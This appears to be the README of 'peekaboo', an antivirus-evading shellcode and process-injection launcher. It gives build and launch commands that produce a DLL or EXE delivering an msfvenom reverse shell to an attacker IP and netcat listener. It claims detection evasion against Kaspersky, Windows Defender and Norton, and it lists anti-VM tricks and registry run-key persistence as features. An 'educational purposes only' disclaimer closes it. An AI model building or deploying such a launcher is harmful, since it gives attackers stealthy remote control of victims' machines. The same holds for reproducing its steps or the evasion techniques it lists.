Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

XOR encryption and decryption for functions call and main payload - msfvenom reverse shell as example.

check your IP:

ip a

run python script with flags:

python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1

run on powershell or cmd promt:

rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy

check your netcat listener:

check attacker ip:

ip a

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2

.\peekaboo.exe

or click (if -m windows param)

check your netcat listener:

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3

.\peekaboo.exe

Tested on:

1. Attacker machines: Kali linux 2020.1, Windows 10 x64
2. Victim machine: Windows 7 x64, Windows 10 x64
3. Payload: windows x64 reverse shell from msfvenom
4. AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus

02 september 2021

https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection

30 december 2021 (NT API injector)

https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection

11 january 2022 (NT API injector)

https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9

10 October 2024

https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9

• Compile injector in Kali linux
• XOR + AES aes branch
• Calling Windows API functions by hash names
• Find Kernel32 base via asm style
• One python builder
• Anti-VM tricks
• Persistence via Windows Registry run keys
• Replace msfvenom shell to donut payload???

This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause

MIT